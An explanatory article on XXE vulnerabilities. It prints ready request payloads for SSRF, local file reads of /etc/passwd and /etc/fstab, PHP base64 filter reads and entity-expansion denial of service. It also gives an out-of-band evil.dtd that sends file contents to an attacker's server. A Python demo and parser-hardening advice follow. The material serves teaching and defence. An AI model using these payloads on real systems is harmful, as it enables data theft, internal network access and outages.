What are XXE vulnerabilities?
XML external entity (XXE) vulnerabilities (also called XML external entity injections or XXE injections) occur when a web application or API accepts XML from an untrusted source and hands it to a back-end XML parser that is configured to process document type definitions (DTDs) and resolve external entities. An attacker who controls the XML can then make the parser fetch URLs and read files on the server's behalf. Depending on the parser, the platform and what the application does with the parsed result, this enables server-side request forgery (SSRF), disclosure of local files (often described as local file inclusion (LFI) or directory traversal), network port scanning, denial of service (DoS) and, where the platform exposes a suitable protocol wrapper, remote code execution (RCE). The fix is a parser setting, not input filtering: disable DTD processing, or at the very least external entity resolution, before untrusted XML is parsed.
Example of XXE-based SSRF
The entity's SYSTEM identifier is a URL, so the parser fetches it from the server's own network position when it expands &xxe;. The request below goes to 192.168.0.1, an address the attacker could not reach directly; whatever comes back is inserted into <foo>, and if the application reflects that element, or includes the entity text in an error message, the attacker reads the internal resource in the response.
POST http://example.com/xml HTTP/1.1
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY>
<!ENTITY xxe SYSTEM
"http://192.168.0.1/secret.txt">
]>
<foo>
&xxe;
</foo>
Example of XXE local data exfiltration
The same mechanism reads local files when the entity uses a file:// URL. If the parsed content of <foo> reaches the response, the server's /etc/passwd is returned directly to the attacker.
POST http://example.com/xml HTTP/1.1
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY>
<!ENTITY xxe SYSTEM
"file:///etc/passwd">
]>
<foo>
&xxe;
</foo>
Limitations and workarounds for exfiltrating XML data
Reading a file this way only works if its contents can be inlined as XML text. A file that contains characters with meaning in XML (such as < or &) or bytes that are not valid in the declared encoding makes the document malformed, and the parser reports an error instead of returning the contents. The request below tries to read /etc/fstab the same way; whether it succeeds depends on whether the file's contents happen to be well-formed XML text.
POST http://example.com/xml HTTP/1.1
<!DOCTYPE foo [
<!ELEMENT foo ANY>
<!ENTITY bar SYSTEM
"file:///etc/fstab">
]>
<foo>
&bar;
</foo>
Using PHP protocol wrappers
When the back end is PHP, its stream wrappers are accepted as entity URLs. The php://filter wrapper base64-encodes the file before the parser sees it, so the content is always XML-safe, and the attacker decodes it after it comes back in the response.
POST http://example.com/xml.php HTTP/1.1
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY>
<!ENTITY bar SYSTEM
"php://filter/read=convert.base64-encode/resource=/etc/fstab">
]>
<foo>
&bar;
</foo>
Example of an XXE DoS attack
Entities can reference other entities, and every level multiplies the expanded size. The example below is a small version of the "billion laughs" attack: bar is expanded 2 x 4 x 5 = 40 times, but with ten levels of ten references each the parser tries to materialise gigabytes of text from a payload of under a kilobyte. Current libxml2 and libexpat releases cap entity amplification; parsers built without those limits, or with them raised (libxml2's XML_PARSE_HUGE), remain exposed.
POST http://example.com/xml HTTP/1.1
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY>
<!ENTITY bar "World ">
<!ENTITY t1 "&bar;&bar;">
<!ENTITY t2 "&t1;&t1;&t1;&t1;">
<!ENTITY t3 "&t2;&t2;&t2;&t2;&t2;">
]>
<foo>
Hello &t3;
</foo>
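The file-read and DoS payloads above assume a parser that resolves external entities and expands nested internal ones. The block below is an added example, not code from the original page: it drives Python's libexpat binding (xml.parsers.expat) in a deliberately vulnerable configuration against a file-read payload and the DoS payload shown above, then in a hardened configuration that refuses any document carrying a DOCTYPE, which is the rule defusedxml applies and the cheapest fix when the application has no legitimate need for DTDs. The file it reads is a constructed temporary file standing in for /etc/passwd, the http:// SSRF case is deliberately left unfetched so the example runs offline, and the function and variable names are the example's own.

```python
# Added example (not from the original page): the same libexpat-based parser
# configured two ways against the page's payloads.
import os
import tempfile
import xml.parsers.expat as expat
from pathlib import Path
from urllib.parse import urlparse
from urllib.request import url2pathname


class XXEError(ValueError):
    """Raised by the hardened configuration when the document carries a DTD."""


def make_secret_file() -> str:
    """Constructed stand-in for /etc/passwd so the demo runs anywhere (assumption)."""
    fd, path = tempfile.mkstemp(suffix=".txt")
    with os.fdopen(fd, "w") as fh:
        fh.write("root:x:0:0:root:/root:/bin/bash\n")
    return path


def file_read_payload(path: str) -> bytes:
    """The page's local-file payload, pointed at `path` instead of /etc/passwd."""
    return (
        '<?xml version="1.0" encoding="ISO-8859-1"?>\n'
        "<!DOCTYPE foo [\n"
        "<!ELEMENT foo ANY>\n"
        f'<!ENTITY xxe SYSTEM "{Path(path).resolve().as_uri()}">\n'
        "]>\n"
        "<foo>\n&xxe;\n</foo>\n"
    ).encode("latin-1")


def dos_payload() -> bytes:
    """The page's nested-entity payload: bar is expanded 2 x 4 x 5 = 40 times."""
    return (
        '<?xml version="1.0" encoding="ISO-8859-1"?>\n'
        "<!DOCTYPE foo [\n"
        "<!ELEMENT foo ANY>\n"
        '<!ENTITY bar "World ">\n'
        '<!ENTITY t1 "&bar;&bar;">\n'
        '<!ENTITY t2 "&t1;&t1;&t1;&t1;">\n'
        '<!ENTITY t3 "&t2;&t2;&t2;&t2;&t2;">\n'
        "]>\n"
        "<foo>\nHello &t3;\n</foo>\n"
    ).encode("latin-1")


def parse_text(xml_bytes: bytes, *, resolve_external: bool, forbid_dtd: bool) -> str:
    """Parse the document and return its concatenated character data.

    resolve_external=True reproduces the vulnerable setup: whatever SYSTEM
    identifier the DTD names is fetched and spliced into the document.
    forbid_dtd=True is the hardened setup: abort at the first DOCTYPE, so no
    entity declaration, internal or external, is ever processed.
    """
    parser = expat.ParserCreate()
    chunks: list[str] = []
    parser.CharacterDataHandler = chunks.append

    if forbid_dtd:
        def reject_doctype(name, sysid, pubid, has_internal_subset):
            raise XXEError(f"refusing document with DOCTYPE {name!r}")
        parser.StartDoctypeDeclHandler = reject_doctype

    if resolve_external:
        def fetch_entity(context, base, system_id, public_id):
            url = urlparse(system_id)
            if url.scheme != "file":
                # An http:// SYSTEM id is the SSRF case; not fetched here so the
                # example stays offline.
                return 1
            with open(url2pathname(url.path), "rb") as fh:
                data = fh.read()
            # Parse the fetched bytes as the entity's replacement text; its
            # character data lands in `chunks` like any other text node.
            sub = parser.ExternalEntityParserCreate(context)
            sub.CharacterDataHandler = chunks.append
            sub.Parse(data, True)
            return 1
        parser.ExternalEntityRefHandler = fetch_entity

    parser.Parse(xml_bytes, True)
    return "".join(chunks)


def demo() -> dict:
    """Run both payloads through both configurations and report the outcomes."""
    secret = make_secret_file()
    results = {}
    results["vulnerable_file_read"] = parse_text(
        file_read_payload(secret), resolve_external=True, forbid_dtd=False).strip()
    results["vulnerable_dos_copies"] = parse_text(
        dos_payload(), resolve_external=True, forbid_dtd=False).count("World ")
    for label, payload in (("hardened_file_read", file_read_payload(secret)),
                           ("hardened_dos", dos_payload())):
        try:
            parse_text(payload, resolve_external=False, forbid_dtd=True)
            results[label] = "accepted"
        except XXEError as err:
            results[label] = f"rejected: {err}"
    os.unlink(secret)
    return results


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

Run directly, it prints the four outcomes: the vulnerable configuration returns the secret file's contents and 40 copies of "World ", the hardened one rejects both documents before any entity is declared. Whichever parser is in use, the check to make is the one the hardened branch performs: with untrusted input, DTD processing and external entity resolution must be off before parsing starts, not filtered out of the document afterwards. For PHP's libxml2-based parsers that means never passing LIBXML_NOENT to DOMDocument::loadXML or simplexml_load_string and, on PHP versions before 8.0, calling libxml_disable_entity_loader(true) first; PHP 8.0 and later disable external entity loading by default.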
What is OOB XXE?
Out-of-band XML external entity (OOB XXE, also called blind XXE) vulnerabilities are XXE vulnerabilities in which the application's response never shows the result of the injected entity, for example because the parsed data is stored rather than echoed, or because an error aborts the response. The attack is delivered over one channel, the HTTP request carrying the XML, while the results (such as the contents of sensitive files) are received over another channel, typically an HTTP server the attacker controls, which the vulnerable parser is made to contact.
Example of OOB XXE
The attacker hosts a DTD file on a server they control (192.168.9.52:8787 in this example). The victim's parser is made to fetch that DTD through a parameter entity (%dtd;), and the DTD in turn declares a general entity, fileContents, whose URL points back at the attacker's server with the base64-encoded file appended as the query string. The indirection through an external DTD is required because XML does not allow a parameter entity reference inside an entity value in the internal DTD subset, but does allow it in an external DTD. A minimal evil.dtd for this purpose looks as follows.
evil.dtd
<!ENTITY % all "<!ENTITY fileContents SYSTEM 'http://192.168.9.52:8787/?%file;'>">
Request
POST http://example.com/xml.php HTTP/1.1
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE root [
<!ENTITY % file SYSTEM
"php://filter/read=convert.base64-encode/resource=/etc/hosts">
<!ENTITY % dtd SYSTEM
"http://192.168.9.52:8787/ctf_train/php/evil.dtd">
%dtd;
%all;
]>
<root>
<user>
&fileContents;
</user>
</root>
When the parser expands &fileContents; it requests http://192.168.9.52:8787/?<base64 of /etc/hosts> from the attacker's server, so the file arrives in that server's access log even though the application never returns it to the client. The base64 step is what keeps the file contents usable in a URL and free of characters that would break the DTD.